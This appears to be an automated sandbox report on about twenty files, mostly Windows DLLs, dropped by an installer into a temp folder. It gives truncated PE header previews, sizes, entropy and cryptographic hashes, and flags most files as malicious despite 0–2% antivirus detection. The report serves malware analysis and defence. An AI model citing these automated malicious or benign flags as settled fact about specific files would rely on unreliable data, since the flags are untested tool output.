                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....~.........................a......................... ......A3........ ..........................'......................................|....................................................................................text...4|.......~..................`.P`.data...............................@.`..rdata..............................@.`@/4..................................@.0@.bss..................................`..edata...'.......(...R..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..|...........................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):337171
                                                                                Entropy (8bit):6.46334441651647
                                                                                Encrypted:false
                                                                                SSDEEP:3072:TQkk4LTVKDKajZjp8aEEHeEkls4q5dRIFSqObK/q+P82JSccgSGDGxQXKHlTmn93:3kwpKlf1QNSqOb6q+PRJb6GDGmKH893
                                                                                MD5:51D62C9C7D56F2EF2F0F628B8FC249AD
                                                                                SHA1:33602785DE6D273F0CE7CA65FE8375E91EF1C0BC
                                                                                SHA-256:FC3C82FAB6C91084C6B79C9A92C08DD6FA0659473756962EFD6D8F8418B0DD50
                                                                                SHA-512:03FB13AE5D73B4BABA540E3358335296FB28AA14318C27554B19BB1E90FAD05EA2DD66B3DB216EA7EED2A733FE745E66DB2E638F5ED3B0206F5BE377F931DF5B
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..............#......................... .....c.........................`................ ..........................8........... .......................0.../......................................................`............................text...............................`.P`.data...`.... ......................@.0..rdata..4....0......................@.`@/4......D...........................@.0@.bss..................................`..edata...8.......:...p..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc.../...0...0..................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):235032
                                                                                Entropy (8bit):6.398850087061798
                                                                                Encrypted:false
                                                                                SSDEEP:6144:fWa7MVS9CtXk4wP0filbZ5546Qx/cwx/svQbKDazN1x:3MVTtXlwP0f0rK6QxEYz
                                                                                MD5:E1D0ACD1243F9E59491DC115F4E379A4
                                                                                SHA1:5E9010CFA8D75DEFBDC3FB760EB4229ACF66633B
                                                                                SHA-256:FD574DA66B7CCAE6F4DF31D5E2A2C7F9C5DAE6AE9A8E5E7D2CA2056AB29A8C4F
                                                                                SHA-512:392AA2CF6FBC6DAA6A374FD1F34E114C21234061855413D375383A97951EC5DDDF91FD1C431950045105746898E77C5C5B4D217DF0031521C69403EA6ADE5C27
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........Y......#..............................tp.......................................... .........................$...............................................................................................<............................text...............................`.P`.data...L...........................@.0..rdata...1.......2..................@.`@/4.......m... ...n..................@.0@.bss..................................`..edata..$............`..............@.0@.idata...............j..............@.0..CRT....,............t..............@.0..tls.... ............v..............@.0..reloc...............x..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):165739
                                                                                Entropy (8bit):6.062324507479428
                                                                                Encrypted:false
                                                                                SSDEEP:3072:wqozCom32MhGf+cPlDQ6jGQGExqLsGXnru+5FMCp:wqxo4LGlDQ6yQGsqLsGXruSFMCp
                                                                                MD5:E2F18B37BC3D02CDE2E5C15D93E38418
                                                                                SHA1:1A6C58F4A50269D3DB8C86D94B508A1919841279
                                                                                SHA-256:7E555192331655B04D18F40E8F19805670D56FC645B9C269B9F10BF45A320C97
                                                                                SHA-512:61AB4F3475B66B04399111B106C3F0A744DC226A59EB03C134AE9216A9EA0C7F9B3B211148B669C32BAFB05851CC6C18BD69EA431DBC2FE25FE470CB4786FD17
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........0.........#.........,.....................n................................&......... .........................y....0...D..................................................................................x7...............................text...............................`.P`.data... ...........................@.0..rdata..............................@.`@/4......Dg.......h..................@.0@.bss....(....p........................`..edata..y............8..............@.0@.idata...D...0...F..................@.0..CRT....,............ ..............@.0..tls.... ............"..............@.0..reloc...............$..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):181527
                                                                                Entropy (8bit):6.362061002967905
                                                                                Encrypted:false
                                                                                SSDEEP:3072:jJoxZgqj/2VkWePT1lempKE7PQrXGx6duqPhyxO+jOfMjHyv:jef/2eH72mprIs6VyfOfMY
                                                                                MD5:0D0D311D1837705B1EAFBC5A85A695BD
                                                                                SHA1:AA7FA3EB181CC5E5B0AA240892156A1646B45184
                                                                                SHA-256:AFB9779C4D24D0CE660272533B70D2B56704F8C39F63DAB0592C203D8AE74673
                                                                                SHA-512:14BC65823B77E192AACF613B65309D5A555A865AC00D2AB422FD209BD4E6C106ECCE12F868692C3EEA6DCCB3FE4AD6323984AEF60F69DA08888ABCD98D76327D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..............#..............................Te......................... ................ .........................b........#......................................................................................H............................text...$...........................`.P`.data...4...........................@.0..rdata...J.......L..................@.`@/4.......I... ...J..................@.0@.bss.........p........................`..edata..b............@..............@.0@.idata...#.......$...V..............@.0..CRT....,............z..............@.0..tls.... ............|..............@.0..rsrc................~..............@.0..reloc..............................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):448557
                                                                                Entropy (8bit):6.353356595345232
                                                                                Encrypted:false
                                                                                SSDEEP:12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
                                                                                MD5:908111F583B7019D2ED3492435E5092D
                                                                                SHA1:8177C5E3B4D5CC1C65108E095D07E0389164DA76
                                                                                SHA-256:E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
                                                                                SHA-512:FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....,...................@.....i......................... ......._........ .........................[.......X...............................(&...................................................... ............................text...d*.......,..................`.P`.data........@.......0..............@.`..rdata......P.......2..............@.`@/4..................................@.0@.bss....|.............................`..edata..[............j..............@.0@.idata..X...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..(&.......(..................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):463112
                                                                                Entropy (8bit):6.363613724826455
                                                                                Encrypted:false
                                                                                SSDEEP:12288:qyoSS9Gy176UixTUTfeKEVfA/K4FW0BGXOjY:pS93176nxTUTEA/Kuk
                                                                                MD5:D9D9C79E35945FCA3F9D9A49378226E7
                                                                                SHA1:4544A47D5B9765E5717273AAFF62724DF643F8F6
                                                                                SHA-256:18CBD64E56CE58CE7D1F67653752F711B30AD8C4A2DC4B0DE88273785C937246
                                                                                SHA-512:B0A9CEFAC7B4140CC07E880A336DCBAB8B6805E267F4F8D9423111B95E4D13544D8952D75AB51ADE9F6DACE93A5425E6D41F42C2AA88D3A3C233E340EE785EB9
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........V.........#.........R....................lf.......................................... ......................@..w.......................................<....................................................................................text...$...........................`.P`.data... ...........................@.0..rdata...J.......L..................@.`@/4..................................@.0@.bss....h....0........................`..edata..w....@......................@.0@.idata..............................@.0..CRT....,............4..............@.0..tls.... ............6..............@.0..reloc..<............8..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):268404
                                                                                Entropy (8bit):6.265024248848175
                                                                                Encrypted:false
                                                                                SSDEEP:3072:yL8lD0bVAYhILCN0z+tUbO01CDXQ6yw+RseNYWFZvc/NNap:1Uy+tUbO01CDXQ6ywcYWFZvCNNap
                                                                                MD5:C4C23388109D8A9CC2B87D984A1F09B8
                                                                                SHA1:74C9D9F5588AFE721D2A231F27B5415B4DEF8BA6
                                                                                SHA-256:11074A6FB8F9F137401025544121F4C3FB69AC46CC412469CA377D681D454DB3
                                                                                SHA-512:060F175A87FBDF3824BEED321D59A4E14BE131C80B7C41AFF260291E69A054F0671CC67E2DDA3BE8A4D953C489BC8CDE561332AA0F3D82EF68D97AFCF115F6A3
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....V...................p....4j.......................................... ......................`.......`..xk..............................D....................................................k...............................text....T.......V..................`.P`.data... ....p.......Z..............@.0..rdata..X ......."...\..............@.`@/4......0............~..............@.0@.bss....H....P........................`..edata.......`......................@.0@.idata..xk...`...l..................@.0..CRT....,............x..............@.0..tls.... ............z..............@.0..reloc..D............|..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):171848
                                                                                Entropy (8bit):6.579154579239999
                                                                                Encrypted:false
                                                                                SSDEEP:3072:LrhG5+L/AcY680k2SxVqetJP5Im+A9mNoWqlM5ywwoS:LV6+LA0G0enP5PFYOWi6w1
                                                                                MD5:236A679AB1B16E66625AFBA86A4669EB
                                                                                SHA1:73AE354886AB2609FFA83429E74D8D9F34BD45F2
                                                                                SHA-256:B1EC758B6EDD3E5B771938F1FEBAC23026E6DA2C888321032D404805E2B05500
                                                                                SHA-512:C19FA027E2616AC6B4C18E04959DFE081EF92F49A11260BA69AFE10313862E8FEFF207B9373A491649928B1257CF9B905F24F073D11D71DCD29B0F9ADAC80248
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ......;......#...............................c................................q......... .........................,.......<.......H...........................................................................(................................text...............................`.P`.data... ...........................@.0..rdata..|y.......z..................@.`@/4......HN...@...P... ..............@.0@.bss..................................`..edata..,............p..............@.0@.idata..<............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...H...........................@.0..reloc..............................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):140752
                                                                                Entropy (8bit):6.52778891175594
                                                                                Encrypted:false
                                                                                SSDEEP:3072:Uw0ucwd0gZ36KErK+i+35KwO/hVQN6ulXazERIdF+aP2je8g5og96:ZlcWpErK+i9zEQF+aPKZo6
                                                                                MD5:A8F646EB087F06F5AEBC2539EB14C14D
                                                                                SHA1:4B1FBAB6C3022C3790BC0BD0DD2D9F3BA8FF1759
                                                                                SHA-256:A446F09626CE7CE63781F5864FDD6064C25D9A867A0A1A07DCECB4D5044B1C2B
                                                                                SHA-512:93BB40C5FE93EF97FE3BC82A0A85690C7B434BD0327BB8440D51053005A5E5B855F9FCC1E9C676C43FF50881F860817FF0764C1AD379FC08C4920AA4A42C5DBC
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....T...................p.....a.......................................... ......................0.......@.......p..@.......................T............................`......................8B...............................text....R.......T..................`.P`.data........p.......X..............@.`..rdata...F.......H...\..............@.`@/4......L3.......4..................@.0@.bss....@.............................`..edata.......0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...@....p......................@.0..reloc..T...........................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):509934
                                                                                Entropy (8bit):6.031080686301204
                                                                                Encrypted:false
                                                                                SSDEEP:6144:wx/Eqtn5oeHkJstujMWYVgUr/MSK/zwazshLKl11PC5qLJy1Pkfsm:M/NDXEJIPVgUrgbzslW11UqLJokfsm
                                                                                MD5:02E6C6AB886700E6F184EEE43157C066
                                                                                SHA1:E796B7F7762BE9B90948EB80D0138C4598700ED9
                                                                                SHA-256:EA53A198AA646BED0B39B40B415602F8C6DC324C23E1B9FBDCF7B416C2C2947D
                                                                                SHA-512:E72BC0A2E9C20265F1471C30A055617CA34DA304D7932E846D5D6999A8EBCC0C3691FC022733EAEB74A25C3A6D3F347D3335B902F170220CFE1DE0340942B596
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........P......#...............................k......................... ......CY........ .....................................................................................................................|...,............................text...T...........................`.P`.data...............................@.0..rdata..XN.......P..................@.`@/4.......x...0...z..................@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):814068
                                                                                Entropy (8bit):6.5113626552096
                                                                                Encrypted:false
                                                                                SSDEEP:24576:ZEygs0MDl9NALk12XBoO/j+QDr4TARkKtff8WvLCC2:vKMDl9aGO+/TAR5tff8og
                                                                                MD5:5B1EB4B36F189362DEF93BF3E37354CC
                                                                                SHA1:8C0A4992A6180D0256ABF669DFDEE228F03300BA
                                                                                SHA-256:D2D7D9821263F8C126C6D8758FFF0C88F2F86E7E69BFCC28E7EFABC1332EEFD7
                                                                                SHA-512:BF57664A96DC16DAD0BB22F6BE6B7DAE0BB2BA2C6932C8F64AEC953E77DC5CDA48E3E05FB98EFE766969832DBC6D7357F8B8D144BD438E366CE746B3B31E2C96
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Wl....i......#..............................Tl.................................`........ ..........................b...`...L.......h...................@...I...................................................j..X............................text..............................`.P`.data...............................@.`..rdata..\...........................@.`@/4.......S...p...T...H..............@.0@.bss..................................`..edata...b.......d..................@.0@.idata...L...`...L..................@.0..CRT....,............L..............@.0..tls.... ............N..............@.0..rsrc....h.......j...P..............@.0..reloc...I...@...J..................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):98626
                                                                                Entropy (8bit):6.478068795827396
                                                                                Encrypted:false
                                                                                SSDEEP:1536:HDuZqv5WNPuWOD+QZ7OWN4oOlatKZ2XGnToIfQIOEIOGxpdo4VoWsj:r9P6WN4wyTBfGqGxpdo4VoB
                                                                                MD5:70CA53E8B46464CCF956D157501D367A
                                                                                SHA1:AE0356FAE59D9C2042270E157EA0D311A831C86A
                                                                                SHA-256:4A7AD2198BAACC14EA2FFD803F560F20AAD59C3688A1F8AF2C8375A0D6CC9CFE
                                                                                SHA-512:CB1D52778FE95D7593D1FDBE8A1125CD19134973B65E45F1E7D21A6149A058BA2236F4BA90C1CE01B1B0AFAD4084468D1F399E98C1F0D6F234CBA023FCC7B4AE
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....='=.x..=......#.........t.....................c.......................................... .................................8...............................0...................................................0................................text...t...........................`.P`.data... ...........................@.0..rdata...M.......N..................@.`@/4......t&...P...(...4..............@.0@.bss..................................`..edata...............\..............@.0@.idata..8............f..............@.0..CRT....,............n..............@.0..tls.... ............p..............@.0..reloc..0............r..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):101544
                                                                                Entropy (8bit):6.237382830377451
                                                                                Encrypted:false
                                                                                SSDEEP:1536:nrYjG+7rjCKdiZ4axdj+nrlv3ecaQZ93yQNMRP2Ea5JPTxi0C9A046QET:M9eKdiBxUnfb3yZROEYJPTxib9A5ET
                                                                                MD5:E13FCD8FB16E483E4DE47A036687D904
                                                                                SHA1:A54F56BA6253D4DECAAE3DE8E8AC7607FD5F0AF4
                                                                                SHA-256:0AC1C17271D862899B89B52FAA13FC4848DB88864CAE2BF4DC7FB81C5A9A49BF
                                                                                SHA-512:38596C730B090B19E34183182273146C3F164211644EBC0A698A83651B2753F7D9B1D6EE477D1798BD7219B5977804355E2F57B1C3013BF3D498BF96DEC9D02E
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#.........`....................Hk.................................$........ ......................`..-....p......................................................................................Lt...............................text...............................`.P`.data...L...........................@.0..rdata..............................@.`@/4.......*... ...,..................@.0@.bss.........P........................`..edata..-....`.......*..............@.0@.idata.......p... ...0..............@.0..CRT....,............P..............@.0..tls.... ............R..............@.0..rsrc................T..............@.0..reloc...............X..............@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):92019
                                                                                Entropy (8bit):5.974787373427489
                                                                                Encrypted:false
                                                                                SSDEEP:1536:+j80nVGEhJyBnvQXUDkUPoWCSgZosDGMsZLXWU9+HN4yoRtJJ:C8IgtyUDkBWIZosDGDBXWPHN4yoRtJJ
                                                                                MD5:CC7DAD980DD04E0387795741D809CBF7
                                                                                SHA1:A49178A17B1C72AD71558606647F5011E0AA444B
                                                                                SHA-256:0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
                                                                                SHA-512:E4441D222D7859169269CA37E491C37DAA6B3CDD5F4A05A0A246F21FA886F5476092E64DFF88890396EF846B9E8D2880E33F1F594CD61F09023B3EF4CD573EA3
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(....0..7......#.........,.....................m................................B......... ...................... .......0...*...........................................................p......................t5...............................text..............................`.P`.data... ...........................@.0..rdata..............................@.`@/4.......(.......*..................@.0@.bss..................................`..edata....... ......................@.0@.idata...*...0...,..................@.0..CRT....,....`....... ..............@.0..tls.... ....p......."..............@.0..rsrc................$..............@.0..reloc...............(..............@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):26562
                                                                                Entropy (8bit):5.606958768500933
                                                                                Encrypted:false
                                                                                SSDEEP:768:EaiL7abI5n6MnFUKs7qfSWWmJZLfw2tnPrPkV:4XabI5n5niKsOwmnU
                                                                                MD5:E9C7068B3A10C09A283259AA1B5D86F2
                                                                                SHA1:3FFE48B88F707AA0C947382FBF82BEE6EF7ABB78
                                                                                SHA-256:06294F19CA2F7460C546D4D0D7B290B238C4959223B63137BB6A1E2255EDA74F
                                                                                SHA-512:AC4F521E0F32DBF104EF98441EA3403F0B7D1B9D364BA8A0C78DAA056570649A2B45D3B41F0B16A1A73A09BAF2870D23BD843E6F7E9149B697F7E6B7222E0B81
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7G7.Z..V......#.....(...V...............@.....m.......................................... .........................O...............p.......................l.......................................................@............................text....&.......(..................`.P`.data...0....@.......,..............@.0..rdata.......P......................@.0@/4...........`.......6..............@.0@.bss.........p........................`..edata..O............B..............@.0@.idata...............D..............@.0..CRT....,............N..............@.0..tls.... ............P..............@.0..rsrc...p............R..............@.0..reloc..l............V..............@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):248694
                                                                                Entropy (8bit):6.346971642353424
                                                                                Encrypted:false
                                                                                SSDEEP:6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
                                                                                MD5:39A15291B9A87AEE42FBC46EC1FE35D6
                                                                                SHA1:AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
                                                                                SHA-256:7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
                                                                                SHA-512:FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....x.........................i.......................................... ......................`..u........1...................................................................................................................text...Tw.......x..................`.P`.data................|..............@.`..rdata..t;.......<...~..............@.`@/4.......f.......h..................@.0@.bss.........P........................`..edata..u....`......."..............@.0@.idata...1.......2...>..............@.0..CRT....,............p..............@.0..tls.... ............r..............@.0..reloc...............t..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):121524
                                                                                Entropy (8bit):6.347995296737745
                                                                                Encrypted:false
                                                                                SSDEEP:1536:9v6EzEhAArrzEYz8V2clMs4v6C7382gYbByUDM6H0ZulNDnt8zXxgf:9T8AArrzDylMs5C738FYbpH0Ent8zBgf
                                                                                MD5:6CE25FB0302F133CC244889C360A6541
                                                                                SHA1:352892DD270135AF5A79322C3B08F46298B6E79C
                                                                                SHA-256:E06C828E14262EBBE147FC172332D0054502B295B0236D88AB0DB43326A589F3
                                                                                SHA-512:3605075A7C077718A02E278D686DAEF2E8D17B160A5FEDA8D2B6E22AABFFE0105CC72279ADD9784AC15139171C7D57DBA2E084A0BA22A6118FDBF75699E53F63
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8r>....7......#.....^...................p.....n.........................0................ ........................._.................................... .......................................................................................text...X].......^..................`.P`.data... ....p.......b..............@.0..rdata........... ...d..............@.`@/4...............0..................@.0@.bss....(.............................`..edata.._...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc....... ......................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):248781
                                                                                Entropy (8bit):6.474165596279956
                                                                                Encrypted:false
                                                                                SSDEEP:3072:oW4uzRci3pB4FvOhUHN1Dmfk46sR6/9+B7Bt9Z42fTSCi3QUqbQrPeL8rFErGfju:n4uB4FvHNElE9+B7Bj6GTSCiZPNVS
                                                                                MD5:C4002F9E4234DFB5DBE64C8D2C9C2F09
                                                                                SHA1:5C1DCCE276FDF06E6AA1F6AD4D4B49743961D62D
                                                                                SHA-256:F5BC251E51206592B56C3BD1BC4C030E2A98240684263FA766403EA687B1F664
                                                                                SHA-512:4F7BC8A431C07181A3D779F229E721958043129BBAEC65A538F2DD6A2CAB8B4D6165B4149B1DF56B31EB062614363A377E1982FD2F142E49DA524C1C96FC862E
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........]......#...............................h......................... .......!........ .........................A.......\.......................................................................................\............................text..............................`.P`.data...T...........................@.0..rdata..P[.......\..................@.`@/4.......v...0...v..................@.0@.bss..................................`..edata..A........ ..................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):397808
                                                                                Entropy (8bit):6.396146399966879
                                                                                Encrypted:false
                                                                                SSDEEP:6144:q6WhfTNgMVVPwCxpk76CcIAg8TQfn9l1bBE3A97vupNBXH:q60TvSGpk7eIAg489l1S3A97vkVH
                                                                                MD5:E0747D2E573E0A05A7421C5D9B9D63CC
                                                                                SHA1:C45FC383F9400F8BBE0CA8E6A7693AA0831C1DA7
                                                                                SHA-256:25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
                                                                                SHA-512:201EE6B2FD8DCD2CC873726D56FD84132A4D8A7434B581ABD35096A5DE377009EC8BC9FEA2CC223317BBD0D971FB1E61610509E90B76544BDFF069E0D6929AED
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\4......n......#......................... ....Dk.......................................... ..........................5...0...............................`..T............................P.......................2...............................text...D...........................`.P`.data...X1... ...2..................@.`..rdata..x....`.......F..............@.`@/4..................................@.0@.bss....`.............................`..edata...5.......6..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..reloc..T....`......................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):3295744
                                                                                Entropy (8bit):6.761851253058962
                                                                                Encrypted:false
                                                                                SSDEEP:24576:q1FmlZTruZZAJwOo/l56wD4KmpIp8qUIOD8Voc2kSB3yHcOoCBw5F8qV3B/Xv26+:0KHZotmpNI3ICzd7pT+mEthKtgVUr
                                                                                MD5:9579F5EA5E9073844FAF9F72A750EBA8
                                                                                SHA1:469AEB3EF17AAB785DEE143F3BACE7E4695956E8
                                                                                SHA-256:A89091154A1D762E084C2BC1E36DCE5D78CD5A807D237E9023D303FFC485D0F7
                                                                                SHA-512:E3136F8FF00490BE2352C8D7281E19048297DB1F5023F35099318A1E1C94B6ED18ABE56907AFC5286DEE746163574B6AD2624E10D26A58D2D0F9E0A597E0B033
                                                                                Malicious:false
